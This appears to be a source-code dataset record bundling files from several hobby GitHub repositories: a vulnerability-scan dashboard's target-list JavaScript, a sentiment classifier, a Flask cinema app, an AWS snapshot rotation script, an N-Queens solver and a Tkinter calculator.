CURRENT_TIMESTAMP')])\n#\n#     class Meta:\n#         db_table = 'Issue_category'\n#         order_by = 'id', 'created_at'\n\n\n# Users in progress" }, { "alpha_fraction": 0.4982112944126129, "alphanum_fraction": 0.5001192688941956, "avg_line_length": 41.3636360168457, "blob_id": "e811efb0c548718f600e22d562334147cdeef36a", "content_id": 
"cda67904f0a34877d91b4ea451ba41c91a7c98ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4491, "license_type": "no_license", "max_line_length": 159, "num_lines": 99, "path": "/static/js/targets.js", "repo_name": "valerybondarev/dashboard", "src_encoding": "UTF-8", "text": "$(document).ready(function () {\n\n // Поиск по таблице\n // Ищет по всем полям таблицы (даже цифры)\n $(\"#SearchTarget\").keyup(function() {\n _this = this;\n $.each($(\".table-targets tbody tr\"), function () {\n if ($(this).text().toLowerCase().indexOf($(_this).val().toLowerCase()) === -1) {\n $(this).hide();\n } else {\n $(this).show();\n }\n });\n });\n\n // При нажатии на сканирование выбранных\n $('span[data-original-title=\"Scan Targets\"]').click(function () {\n // Обходим все отмеченные хосты\n $('.cbx:checked').each(function () {\n // Запускаем сканирование на всех выбранных\n $(this).parent('td').parent('tr').children('td:last-child').children('span').children('a').children('button').removeClass('btn-info');\n $(this).parent('td').parent('tr').children('td:last-child').children('span').children('a').children('button').addClass('btn-danger');\n $(this).parent('td').parent('tr').children('td:last-child').children('span').children('a').children('button').children('i').removeClass('fa-play');\n $(this).parent('td').parent('tr').children('td:last-child').children('span').children('a').children('button').children('i').addClass('fa-stop');\n $(this).parent('td').parent('tr').children('td:last-child').children('span').children('a').children('span').html('Scanning ...');\n $.ajax({\n url: '/scan_target',\n type: 'post',\n data: {'target_id': $(this).data('id')},\n success: function (resp) {\n console.log(resp);\n }\n });\n });\n });\n\n // При выделении всех хостов\n $('span[data-original-title=\"Select All\"]').click(function () {\n $('.cbx').prop(\"checked\",true);\n cnt_cbx = cnt_cbx = $('.cbx').length;\n // Разблокируем кнопку\n $('span[data-original-title=\"Scan Targets\"] > a, span[data-original-title=\"Delete\"] > a').removeClass('disabled');\n });\n\n var cnt_cbx = 0;\n // Считаем количество отмеченных и блокируем/разблокируем кнопку\n $(function () {\n cnt_cbx = $('.cbx:checked').length;\n $('.cbx').bind('click' , function(e, a) {\n if (this.checked) {\n cnt_cbx += a ? -1 : 1;\n } else {\n cnt_cbx += a ? 
1 : -1;\n }\n if(cnt_cbx > 0) {\n $('span[data-original-title=\"Scan Targets\"] > a, span[data-original-title=\"Delete\"] > a').removeClass('disabled');\n } else {\n $('span[data-original-title=\"Scan Targets\"] > a, span[data-original-title=\"Delete\"] > a').addClass('disabled');\n }\n });\n });\n var deleted_target_id = 0;\n // Если нажато удаление выбранных\n $('span[data-original-title=\"Delete\"]').click(function () {\n $('.cbx:checked').each(function () {\n $.ajax({\n url: '/delete_target',\n type: 'post',\n data: {'target_id': $(this).data('id')},\n success: function (resp) {\n console.log(resp);\n $('input[data-id=\"' + resp + '\"]').parents('td').parent('tr').remove();\n }\n });\n\n });\n });\n\n // При нажатии на сканирование напротив хоста\n $('.scan_target').click(function () {\n $(this).children('a').children('button').removeClass('btn-info');\n $(this).children('a').children('button').addClass('btn-danger');\n $(this).children('a').children('button').children('i').removeClass('fa-play');\n $(this).children('a').children('button').children('i').addClass('fa-stop');\n $(this).children('a').children('span').html('Scanning ...');\n $.ajax({\n url: '/scan_target',\n type: 'post',\n data: {'target_id': $(this).data('id')},\n success: function (resp) {\n console.log(resp);\n }\n });\n });\n $('.show_modal').click(function () {\n $('#target-new-modal').modal('show');\n $('#target-new-modal').css('display', 'block');\n })\n});" } ]
6
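The get_cnt_group_issues helper in the dashboard's functions.py above rescans the issue list once per severity level; a single pass with collections.Counter produces the same tally. A minimal sketch, with hypothetical issue dicts standing in for the randomly generated ones:

```python
from collections import Counter

# hypothetical stand-ins for the generated issue dicts (only 'type' matters here)
issues = [{"type": "High"}, {"type": "Low"}, {"type": "High"}, {"type": "Critical"}]

counts = Counter(issue["type"] for issue in issues)
# keep a zero entry for every severity, matching the original return shape
result = {t: counts.get(t, 0) for t in ["Low", "Medium", "High", "Critical"]}
print(result)  # {'Low': 1, 'Medium': 0, 'High': 2, 'Critical': 1}
```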
Abhinavjha07/Sentiment-Analysis
https://github.com/Abhinavjha07/Sentiment-Analysis
f1a2e2d4af75b5c74d14bf7d366d5bfc7987bef9
22af7d737f7607a8df6ee570e3eee2131df3d948
4eba53d3ed54537fcbc66d257683c398c2181281
refs/heads/master
2020-04-17T09:40:45.003364
2019-01-18T20:33:04
2019-01-18T20:33:04
166,468,468
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6940647959709167, "alphanum_fraction": 0.7131979465484619, "avg_line_length": 35.319149017333984, "blob_id": "74c5f0e1a14342ce10cfc60f958c93173f289a84", "content_id": "4f4651d2a083725bae917ee7e9b97d9302336406", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5122, "license_type": "no_license", "max_line_length": 138, "num_lines": 141, "path": "/Sentiment Analysis.py", "repo_name": "Abhinavjha07/Sentiment-Analysis", "src_encoding": "UTF-8", "text": "import nltk\nimport random\nimport pickle\nfrom nltk.corpus import movie_reviews\nfrom nltk.classify.scikitlearn import SklearnClassifier\nfrom sklearn.naive_bayes import MultinomialNB,GaussianNB,BernoulliNB\nfrom sklearn.linear_model import LogisticRegression,SGDClassifier\nfrom sklearn.svm import SVC,LinearSVC,NuSVC\nfrom nltk.classify import ClassifierI\nfrom statistics import mode\nfrom nltk.tokenize import word_tokenize\n\nclass VoteClassifier(ClassifierI):\n def __init__(self,*classifiers):\n self._classifiers = classifiers\n\n def classify(self,features):\n votes = []\n\n for c in self._classifiers:\n v = c.classify(features)\n votes.append(v)\n return mode(votes)\n\n def confidence(self,features):\n votes = []\n\n for c in self._classifiers:\n v = c.classify(features)\n votes.append(v)\n\n choice_votes = votes.count(mode(votes))\n conf = choice_votes / len(votes)\n return conf\n \n\nshort_pos = open(\"positive.txt\",\"r\").read()\nshort_neg = open(\"negative.txt\",\"r\").read()\n\ndocuments =[]\n\nfor r in short_pos.split('\\n'):\n documents.append((r,\"pos\"))\n\nfor r in short_neg.split('\\n'):\n documents.append((r,\"neg\"))\n\nall_words = []\n\nshort_pos_words = word_tokenize(short_pos)\nshort_neg_words = word_tokenize(short_neg)\n\nfor w in short_pos_words:\n all_words.append(w.lower())\n\nfor w in short_neg_words:\n all_words.append(w.lower())\n \nall_words = nltk.FreqDist(all_words)\n#print(all_words.most_common(15))\n\nword_features = list(all_words.keys())[:5000]\n\ndef find_features(document):\n words = word_tokenize(document)\n features = {}\n for w in word_features:\n features[w] = (w in words)\n\n return features\n\n#print((find_features(movie_reviews.words('neg/cv000_29416.txt'))))\nfeaturesets = [(find_features(rev),category)\n for (rev,category) in documents]\n\nrandom.shuffle(featuresets)\n\ntraining_set = featuresets[:10000]\ntesting_set = featuresets[10000:]\n\nclassifier = nltk.NaiveBayesClassifier.train(training_set)\nprint(\"Naive Bayes Algorithm accuracy : \",(nltk.classify.accuracy(classifier,testing_set))*100)\n\nclassifier.show_most_informative_features(20)\n\nMNB_classifier = SklearnClassifier(MultinomialNB())\nMNB_classifier.train(training_set)\nprint(\"MNB Algorithm accuracy : \",(nltk.classify.accuracy(MNB_classifier,testing_set))*100)\n\n\nBernoulliNB_classifier = SklearnClassifier(BernoulliNB())\nBernoulliNB_classifier.train(training_set)\nprint(\"BernoulliNB Algorithm accuracy : \",(nltk.classify.accuracy(BernoulliNB_classifier,testing_set))*100)\n##LogisticRegression,SGDClassifier\n\nLogisticRegression_classifier = SklearnClassifier(LogisticRegression())\nLogisticRegression_classifier.train(training_set)\nprint(\"LogisticRegression Algorithm accuracy : \",(nltk.classify.accuracy(LogisticRegression_classifier,testing_set))*100)\n\n##SGDClassifier_classifier = SklearnClassifier(SGDClassifier())\n##SGDClassifier_classifier.train(training_set)\n##print(\"SGDClassifier Algorithm accuracy : 
\",(nltk.classify.accuracy(SGDClassifier_classifier,testing_set))*100)\n\n\n\n\n##SVC,LinearSVC,NuSVC\nSVC_classifier = SklearnClassifier(SVC())\nSVC_classifier.train(training_set)\nprint(\"SVC Algorithm accuracy : \",(nltk.classify.accuracy(SVC_classifier,testing_set))*100)\n\nLinearSVC_classifier = SklearnClassifier(LinearSVC())\nLinearSVC_classifier.train(training_set)\nprint(\"LinearSVC Algorithm accuracy : \",(nltk.classify.accuracy(LinearSVC_classifier,testing_set))*100)\n\nNuSVC_classifier = SklearnClassifier(NuSVC())\nNuSVC_classifier.train(training_set)\nprint(\"NuSVC Algorithm accuracy : \",(nltk.classify.accuracy(NuSVC_classifier,testing_set))*100)\n\n\nvoted_classifier = VoteClassifier(classifier,\n LinearSVC_classifier,\n NuSVC_classifier,\n SVC_classifier,\n LogisticRegression_classifier,\n MNB_classifier,\n BernoulliNB_classifier)\n\nprint(\"Voted Classifier accuracy : \",(nltk.classify.accuracy(voted_classifier,testing_set))*100)\n\nprint(\"Classification : \",voted_classifier.classify(testing_set[0][0]),\"Confidence : \",voted_classifier.confidence(testing_set[0][0])*100)\nprint(\"Actual classification Result : \",testing[0][1])\n\nprint(\"Classification : \",voted_classifier.classify(testing_set[1][0]),\"Confidence : \",voted_classifier.confidence(testing_set[1][0])*100)\nprint(\"Actual classification Result : \",testing[1][1])\nprint(\"Classification : \",voted_classifier.classify(testing_set[2][0]),\"Confidence : \",voted_classifier.confidence(testing_set[2][0])*100)\nprint(\"Actual classification Result : \",testing[2][1])\nprint(\"Classification : \",voted_classifier.classify(testing_set[3][0]),\"Confidence : \",voted_classifier.confidence(testing_set[3][0])*100)\nprint(\"Actual classification Result : \",testing[3][1])\nprint(\"Classification : \",voted_classifier.classify(testing_set[4][0]),\"Confidence : \",voted_classifier.confidence(testing_set[4][0])*100)\nprint(\"Actual classification Result : \",testing[4][1])\n\n" }, { "alpha_fraction": 0.78515625, "alphanum_fraction": 0.80078125, "avg_line_length": 84.33333587646484, "blob_id": "1c3c68ab409b52e8e909235043cc1f7cc6e37dc8", "content_id": "58e501319d09ac9a81b6037cee8a0cde33f2ec13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 256, "license_type": "no_license", "max_line_length": 171, "num_lines": 3, "path": "/README.md", "repo_name": "Abhinavjha07/Sentiment-Analysis", "src_encoding": "UTF-8", "text": "# Sentiment-Analysis\nAnalyzes the sentiment of text, either positive or negative. \nIn this, we use the scikit-classifiers to create a new classifier to classify the texts as positive or negative. We achieve around 76~80 % accuracy using the given dataset\n" } ]
2
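The VoteClassifier above derives both the predicted label and a confidence score from the same list of classifier votes. The core of that idea fits in a few lines; a toy sketch with made-up votes (note that statistics.mode raises StatisticsError on a tie before Python 3.8, which the script sidesteps by combining an odd number of classifiers):

```python
from statistics import mode

# made-up votes standing in for the seven trained classifiers
votes = ["pos", "neg", "pos", "pos", "neg"]

label = mode(votes)                           # majority label
confidence = votes.count(label) / len(votes)  # fraction of agreeing voters
print(label, confidence)                      # pos 0.6
```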
Parasmani300/cinema-hall
https://github.com/Parasmani300/cinema-hall
439f7c07f544748091ede204ba020e70b699b0c3
d6e1caeddaf78cec1173dfc5309d6f2a65e49836
38acb3dcb4c6c961614b9bbf4865a1240edef679
refs/heads/master
2022-11-27T13:34:39.642753
2020-08-10T07:11:12
2020-08-10T07:11:12
286,402,229
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.613933265209198, "alphanum_fraction": 0.692307710647583, "avg_line_length": 23.571428298950195, "blob_id": "de8d7fb2cc5eb912b03094d5732e3505cbf15deb", "content_id": "37376879f6b9edef2ade4c13487eac61df425915", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 689, "license_type": "no_license", "max_line_length": 58, "num_lines": 28, "path": "/application/__init__.py", "repo_name": "Parasmani300/cinema-hall", "src_encoding": "UTF-8", "text": "\nfrom flask import Flask\nfrom config import Config\nfrom pyrebase import pyrebase\napp = Flask(__name__)\n\napp.config.from_object(Config)\n\nfirebaseConfig = {\n 'apiKey': \"AIzaSyDf0dXPrdtkUNm21XaseVVBPEA_DXeGSUQ\",\n 'authDomain': \"demoapp-8bd99.firebaseapp.com\",\n 'databaseURL': \"https://demoapp-8bd99.firebaseio.com\",\n 'projectId': \"demoapp-8bd99\",\n 'storageBucket': \"demoapp-8bd99.appspot.com\",\n 'messagingSenderId': \"359623902890\",\n 'appId': \"1:359623902890:web:7b049e2908ccda97b6b2d3\",\n 'measurementId': \"G-ZJR8E2L75K\"\n }\n\nfirebase = pyrebase.initialize_app(firebaseConfig)\n\nauth = firebase.auth()\ndb = firebase.database()\n\nfrom application import routes\n\n\nif __name__ == \"__main__\":\n app.run()\n" }, { "alpha_fraction": 0.5245901346206665, "alphanum_fraction": 0.5737704634666443, "avg_line_length": 19.5, "blob_id": "8cbf4b2106efb7d327735fd8b74ab1eb9251286f", "content_id": "c8b21512ad2a16ff1016ab31f9d33fec8e8bd89a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 122, "license_type": "no_license", "max_line_length": 25, "num_lines": 6, "path": "/application/check.py", "repo_name": "Parasmani300/cinema-hall", "src_encoding": "UTF-8", "text": "def lazy_range(upto):\n index = 0\n while index < upto:\n yield index\n index = index + 1\nlazy_range(1000)" }, { "alpha_fraction": 0.7292418479919434, "alphanum_fraction": 0.7292418479919434, "avg_line_length": 26.799999237060547, "blob_id": "0264221023650c5d07012cbe234d7ca09aefa9e0", "content_id": "1e306bbfc0b069bf6ca3d51acf2d7c721012a782", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 277, "license_type": "no_license", "max_line_length": 96, "num_lines": 10, "path": "/application/routes.py", "repo_name": "Parasmani300/cinema-hall", "src_encoding": "UTF-8", "text": "from application import app,db,auth\nfrom flask import Flask, render_template, request, json, Response,redirect,flash,url_for,session\n\[email protected]('/')\ndef index():\n return render_template('index.html')\n\[email protected]('/book')\ndef book():\n return render_template('index.html')" }, { "alpha_fraction": 0.4751552939414978, "alphanum_fraction": 0.6925466060638428, "avg_line_length": 15.947368621826172, "blob_id": "e77d5807807baa32693da532edcf2e9bd45d5695", "content_id": "f11a8c69ded7fb52eb452cac1e48957c33e5ad31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 322, "license_type": "no_license", "max_line_length": 30, "num_lines": 19, "path": "/requirements.txt", "repo_name": "Parasmani300/cinema-hall", "src_encoding": "UTF-8", "text": 
"appdirs==1.4.4\nattrs==19.3.0\nautopep8==1.5.3\nblack==19.10b0\nclick==7.1.2\nFlask==1.1.2\nFlask-WTF==0.14.3\nitsdangerous==1.1.0\nJinja2==2.11.2\nMarkupSafe==1.1.1\nmysql-connector-python==8.0.19\npathspec==0.8.0\npycodestyle==2.6.0\npython-dotenv==0.13.0\nregex==2020.6.8\ntoml==0.10.1\ntyped-ast==1.4.1\nWerkzeug==1.0.1\nWTForms==2.3.1\n" }, { "alpha_fraction": 0.7818182110786438, "alphanum_fraction": 0.800000011920929, "avg_line_length": 17.66666603088379, "blob_id": "2a877a710a9a7044a83624f33c4d9ff8abd607f7", "content_id": "d499e8d158efc2fb6e6eaed980f98de9044a9a2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 55, "license_type": "no_license", "max_line_length": 21, "num_lines": 3, "path": "/.flaskenv", "repo_name": "Parasmani300/cinema-hall", "src_encoding": "UTF-8", "text": "FLASK_ENV=development\nFLASK_DEBUG=1\nFLASK_APP = main.py" } ]
5
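A side note on check.py above: the bare lazy_range(1000) call at module level does nothing observable, because a generator's body only runs as values are requested. A minimal sketch of that behaviour:

```python
def lazy_range(upto):
    index = 0
    while index < upto:
        yield index
        index += 1

gen = lazy_range(1000)     # builds a generator object; no iteration happens yet
print(next(gen))           # 0 -- the body runs only when a value is pulled
print(sum(lazy_range(5)))  # 10 -- consuming the generator drives it to completion
```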
dignajar/amazon-aws-scripts
https://github.com/dignajar/amazon-aws-scripts
c0066ce3c1b246b311dee189879adcb5e3d26faa
1ba62b6ffb31bb9af2e825585c9c8833294cd5b0
f7adfa9210ea66e4b253bbaad1ab853e0d76c4e4
refs/heads/master
2021-01-01T05:19:49.701079
2017-04-11T12:56:33
2017-04-11T12:56:33
59,707,021
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7416545748710632, "alphanum_fraction": 0.7634252309799194, "avg_line_length": 25.461538314819336, "blob_id": "6ad08a358374ef26432bd9e0658a3145bd3b7cf8", "content_id": "9e659f502f290a95b431cade6ef29f73bfb506db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 689, "license_type": "no_license", "max_line_length": 158, "num_lines": 26, "path": "/README.md", "repo_name": "dignajar/amazon-aws-scripts", "src_encoding": "UTF-8", "text": "# Amazon AWS scripts\n\nAll scripts uses the library boto3.\n\n## snapshot.py\nCreate and delete old snapshot.\nWhen execute the script this will be create an snapshot of a volumeID, on the description of the snapshot will appear expiration date.\n\n### Variables configuration\nEdit the variables inside the file.\n\n```\n# Volume ID for snapshot\nvolumenID = \"vol-XXXX\"\n\n# Username with permissions, credentials are in .aws/credentials\nusername = \"snapshot\"\n\n# Region name\nregion = \"us-east-1\"\n\n# Amount of snapshot\nsnapshotAmount = 2\n```\n\nFor example if you create a snapshot on 25 May 2016, the snapshot will expire on 27 May 2016, the variable `snapshotAmount` has the amount of expiration days.\n\n" }, { "alpha_fraction": 0.5100046396255493, "alphanum_fraction": 0.5183806419372559, "avg_line_length": 29.26760482788086, "blob_id": "e62bdd8a66a1c6cbe47c9ad0275eeb5d82ea6503", "content_id": "b3e920acb59f4e2993ef3544351e525febfa7705", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2149, "license_type": "no_license", "max_line_length": 89, "num_lines": 71, "path": "/snapshot.py", "repo_name": "dignajar/amazon-aws-scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# EDIT\n# ------------------------------------------------------------------------------\n\n# Volume ID for snapshot\nvolumenID = \"vol-eb194f49\"\n\n# Username with permissions, credentials are in .aws/credentials\nusername = \"snapshot\"\n\n# Region name\nregion = \"us-east-1\"\n\n# Amount of snapshot/days\nsnapshotAmount = 2\n\n# Libraries\n# ------------------------------------------------------------------------------\nimport boto3\nimport json\nfrom datetime import datetime, timedelta\n\n# Today and tomorrow date\n# ------------------------------------------------------------------------------\ntodayDate = datetime.today()\ntomorrowDate = todayDate + timedelta(days=snapshotAmount)\n\n# Session\n# ------------------------------------------------------------------------------\nsession = boto3.Session(profile_name=username)\n\n# EC2 session\n# ------------------------------------------------------------------------------\nec2 = session.client(\"ec2\", region_name=region)\n\n# Create snapshot\n# ------------------------------------------------------------------------------\n\n# All snapshot has the description \"backup_delete_on:Tomorrow date\"\ndescription = \"backup_delete_on:\"+tomorrowDate.strftime(\"%Y-%m-%d\")\n\n# Launch create snapshot\nprint \"Creating snapshot...\"\nprint ec2.create_snapshot(VolumeId=volumenID, Description=description)\nprint \"\"\n\n# Delete old snapshots\n# ------------------------------------------------------------------------------\n\n# snapshot list\nsnapshotList = ec2.describe_snapshots()\nfor snap in snapshotList['Snapshots']:\n\n # snapshot ID\n snapID = snap['SnapshotId']\n\n # snapshot descripton\n snapDescription = snap['Description']\n\n # if the snapshot description has \"backup_delete_on\"\n if 
snapDescription.split(\":\")[0] == \"backup_delete_on\":\n\n        # get the snapshot date\n        snap_date = datetime.strptime(snapDescription.split(\":\")[1], \"%Y-%m-%d\")\n\n        # if the snapshot date is before today, delete it\n        if snap_date < todayDate:\n            print \"Deleting snapshot: ID \"+snapID+\", Date \"+snapDescription.split(\":\")[1]\n            print ec2.delete_snapshot(SnapshotId=snapID)\n            print \"\"\n" } ]
2
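The expiration scheme in snapshot.py is just a tagged date stored in the snapshot description. The round trip, independent of boto3, looks like this (snapshot_amount mirrors the script's snapshotAmount setting):

```python
from datetime import datetime, timedelta

snapshot_amount = 2  # days until expiration, as in the script's snapshotAmount
expiration = datetime.today() + timedelta(days=snapshot_amount)
description = "backup_delete_on:" + expiration.strftime("%Y-%m-%d")
print(description)  # e.g. backup_delete_on:2016-05-27

# deletion side: recover the stored date and compare it against today
tag, date_str = description.split(":")
if tag == "backup_delete_on":
    expired = datetime.strptime(date_str, "%Y-%m-%d") < datetime.today()
    print(expired)  # False until snapshot_amount days have passed
```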
Ryan-Red/N-Queens-CSP
https://github.com/Ryan-Red/N-Queens-CSP
b48d7d950f09815144fc129e3c8a9d6a765007e8
dc4ac885c48e2768d74b473d82777f14629d2d04
8a66e2c5e5cde336b9fa81ec1230f95a276deff0
refs/heads/main
2023-07-07T00:29:26.405845
2021-08-15T14:04:18
2021-08-15T14:04:18
396,370,576
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7810651063919067, "alphanum_fraction": 0.7810651063919067, "avg_line_length": 41.25, "blob_id": "c2b64244a99033a9c439029dd7821f9a5d10cd44", "content_id": "beaecd06fb3203be8617ada26b6c6c95cb7c6f8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 169, "license_type": "no_license", "max_line_length": 86, "num_lines": 4, "path": "/README.md", "repo_name": "Ryan-Red/N-Queens-CSP", "src_encoding": "UTF-8", "text": "# N-Queens-CSP\nThis is my quick and dirty N-Queens CSP solver in python that uses Backtracking search\n\nI plan to add in a way to solve the CSP using GAC Arc Consistency\n" }, { "alpha_fraction": 0.5429160594940186, "alphanum_fraction": 0.5635307431221008, "avg_line_length": 30.120481491088867, "blob_id": "b710540ec9ed73db28ba48790ed2977f5c9d4e4c", "content_id": "90b6e415a642d97e239430369f8b278072f9c3de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5336, "license_type": "no_license", "max_line_length": 157, "num_lines": 166, "path": "/N-QueensCSP.py", "repo_name": "Ryan-Red/N-Queens-CSP", "src_encoding": "UTF-8", "text": "\r\n############################################################################################\r\n#Constants!\r\n\r\nN = 8 #Size we are choosing\r\n\r\nQUEEN_SYMBOL = 2 #2 means queen, 0 means no queen\r\n\r\n############################################################################################\r\n\r\n\r\n\r\n#This is a list of all the queen's locations in each row. The value of 0 means nothing placed\r\nqueen_placed = [0 for i in range(0,N)]\r\n\r\n\r\n#This function is meant to scan if there is a queen present in a given row.\r\ndef scanForQueen(queens_array,row):\r\n column = 0\r\n for column in range(0,N):\r\n if (queens_array[row][column] == QUEEN_SYMBOL):\r\n queen_placed[row] = column + 1 # there is a queen in the row\r\n\r\n\r\n\r\n#diagonal constraint, make sure nothing is diagonal from the queens already placed.\r\ndef diagContraint(queens_array, new_row, new_column):\r\n\r\n i = 0\r\n queen_column = 0\r\n queen_row = 0\r\n #go through each row, if queen is present want to check if the new location is potentially diagonal from the queen we are looking at.\r\n for i in range(0,N):\r\n if(i == new_row):\r\n continue\r\n if(queen_placed[i] != 0):\r\n queen_row = i\r\n #this is the trick we had from before to save the queen's location and know if a queen is in the current row all at the same time.\r\n queen_column = queen_placed[i] - 1\r\n\r\n row_diff = abs(queen_row - new_row)\r\n col_diff = abs(queen_column - new_column)\r\n\r\n if(row_diff == col_diff):\r\n\r\n return False #constraint is not respected\r\n\r\n return True #all rows are safe\r\n\r\n\r\n#constraint to ensure nothing is in the same column\r\ndef colConstraint(queens_array, new_column):\r\n i = 0\r\n\r\n for i in range(0,N):\r\n if(queens_array[i][new_column] != 0):\r\n return False\r\n\r\n return True\r\n\r\n#constraint to ensure that no other queens are on the same row\r\ndef rowConstraint(queens_array, new_row):\r\n j = 0\r\n\r\n for j in range(0,N):\r\n if(queens_array[new_row][j] != 0):\r\n return False\r\n\r\n return True\r\n\r\n#The meat of the solution, this is the function that finds the optimal placement of the queens to solve this Constraint Satisfaction Problem (CSP)\r\ndef backTrackingSearch(queens_array,row):\r\n #If the current row is N, we know we made it to the end,\r\n if row == N:\r\n return True, queens_array\r\n\r\n #If 
no queen has been placed in this row yet, try each column; otherwise skip to the next row.\r\n    if(queen_placed[row] == 0):\r\n        col = 0\r\n        \r\n        #Go through every possible position in the row\r\n        for col in range(0,N):\r\n\r\n            queen_placed[row] = 0 \r\n\r\n            #check if all 3 constraints are satisfied\r\n            if((rowConstraint(queens_array,row) == True) and (colConstraint(queens_array,col) == True) and (diagContraint(queens_array,row,col) == True)):\r\n                #Set the queen at this row at the current position, saving it in 2 places \r\n                queen_placed[row] = col + 1\r\n                queens_array[row][col] = QUEEN_SYMBOL\r\n\r\n                #Recursively go down to the next level in hopes of having found the \"right\" combination\r\n                ret = backTrackingSearch(queens_array,row +1)\r\n\r\n                #If it returns true, we know that we made it to the end and as such can break out\r\n                if ret[0] == True:\r\n                    return ret\r\n\r\n                #Reset changes made and try again with another position if we didn't find a good path.\r\n                queens_array[row][col] = 0\r\n                queen_placed[row] = 0 \r\n    else:\r\n        #if the queen was already placed on this row, move on to the next one.\r\n        ret = backTrackingSearch(queens_array,row +1)\r\n\r\n        #If it returns true, we know that we made it to the end and as such can break out\r\n        if ret[0] == True:\r\n            return ret\r\n    \r\n\r\n    return False,queens_array\r\n\r\n#function that prints the board nicely \r\ndef printBoard(queens_array):\r\n    for line in queens_array:\r\n        print(line) \r\n\r\n\r\n\r\n\r\n\r\n\r\n#This is the function that runs things and calls the algo.\r\ndef main():\r\n    \r\n    #variables used for iteration\r\n    i = 0\r\n    j = 0\r\n\r\n\r\n\r\n    #generate the queens array (the board we are playing on)\r\n    queens_array = [[0 for i in range(0,N)] for j in range(0,N)]\r\n    # queens_array = [[0,0,0,0,0,0,0,0], \r\n    #                 [0,0,0,0,0,0,0,0],\r\n    #                 [0,0,0,0,0,0,0,0],\r\n    #                 [0,0,0,0,0,0,0,0],\r\n    #                 [0,0,0,0,0,0,0,0], \r\n    #                 [0,0,0,0,0,0,0,0],\r\n    #                 [0,0,0,0,0,0,0,0],\r\n    #                 [0,0,0,0,0,0,0,0]] \r\n\r\n\r\n\r\n    #we can place a queen wherever we want, this is only to be used when the prof selects the location for the queen. You can get rid of this and it'll work.\r\n    queens_array[3][2] = QUEEN_SYMBOL\r\n\r\n    #have it scan over the array and just save the position of the queen, wherever it is just so we can access it easier \r\n    for i in range(0,N):\r\n        scanForQueen(queens_array,i)\r\n\r\n\r\n    \r\n    #start the algorithm at the beginning of the board (0th row)\r\n    ret = backTrackingSearch(queens_array,0)\r\n\r\n    \r\n    #get the returned \"solved\" board\r\n    queens_array = ret[1]\r\n\r\n    #this is my function to print it out\r\n    printBoard(queens_array)\r\n\r\n\r\n\r\nmain()\r\n\r\n" } ]
2
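The three constraint checks above collapse to two comparisons if each row stores only its queen's column index, since the row constraint then holds by construction. A compact sketch of the same backtracking search (an illustration of the technique, not the repository's code):

```python
def solve(n, cols=()):
    """Place queens row by row; cols[r] is the column of the queen in row r."""
    row = len(cols)
    if row == n:
        return cols
    for col in range(n):
        # safe if no earlier queen shares the column or a diagonal
        if all(col != c and abs(col - c) != row - r for r, c in enumerate(cols)):
            result = solve(n, cols + (col,))
            if result:
                return result
    return None

print(solve(8))  # e.g. (0, 4, 7, 5, 2, 6, 1, 3)
```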
HoangNKQ/CalculatorApp
https://github.com/HoangNKQ/CalculatorApp
04f96130a5321fb9b7312e2d5274a1006ac65b94
7a47431484f7f7144155a427d9d7f717644fa638
3471043cd1e119002f238be653c0acd7c572fda1
refs/heads/master
2023-08-13T09:34:52.576272
2021-09-29T12:03:55
2021-09-29T12:03:55
411,625,213
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5307336449623108, "alphanum_fraction": 0.5512227416038513, "avg_line_length": 27.828571319580078, "blob_id": "80d8ae3917c759f24098711d2c913c3009224742", "content_id": "4dc0786d043fcb634b61ced52e91f82d27dad4ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3026, "license_type": "no_license", "max_line_length": 101, "num_lines": 105, "path": "/calculator/view.py", "repo_name": "HoangNKQ/CalculatorApp", "src_encoding": "UTF-8", "text": "import tkinter as tk\nfrom tkinter import ttk\n\n\nclass View(tk.Tk):\n def __init__(self):\n super().__init__()\n #self.controller = controller\n\n self.title ('Calculator')\n self.geometry('400x500')\n self.tk.call(\"source\", \"theme\\sun-valley.tcl\")\n self.tk.call(\"set_theme\", \"light\")\n\n self.button_text = ''\n self.expression_text = ''\n self.setup_frame()\n self.init_frame()\n \n\n def setup_frame(self):\n self.rowconfigure(0, weight = 1)\n self.rowconfigure(1, weight = 6)\n self.columnconfigure(0, weight = 1)\n #self.columnconfigure(1, weight = 1)\n\n\n def init_frame(self):\n expression = self.create_expression_frame(self)\n expression.grid(row= 0, column = 0, sticky= 'nsew', padx= 5, pady= 5)\n button = self.create_button_frame(self)\n button.grid(row= 1, column = 0, sticky= 'nsew', padx= 5, pady= 5)\n\n\n def create_expression_frame(self, parent):\n expression_frame = ttk.Frame(parent)\n expression_frame.rowconfigure(0, weight = 1)\n expression_frame.rowconfigure(1, weight = 4)\n expression_frame.columnconfigure(0, weight = 1)\n\n self.equation_label = ttk.Label(expression_frame, text= \"equation\", font=('Arial', 10))\n self.equation_label.grid(row= 0, column= 0, sticky= 'e', padx= 5, pady= 5)\n\n self.result_label = ttk.Label(expression_frame, text= \"Result\", font=('Arial', 30))\n self.result_label.grid(row= 1, column= 0, sticky = 'e', padx= 5, pady= 5)\n\n return expression_frame\n\n def history(self):\n pass\n\n def insert_expression(self, expression_text):\n self.equation_label.configure(text= expression_text)\n\n def insert_result(self, result_text):\n self.result_label.configure(text= result_text)\n\n\n\n def create_button_frame(self, parent):\n # Variables\n self.buttons = []\n button_text = [\n '(',')','C','+',\n '7','8','9','-',\n '4','5','6','*',\n 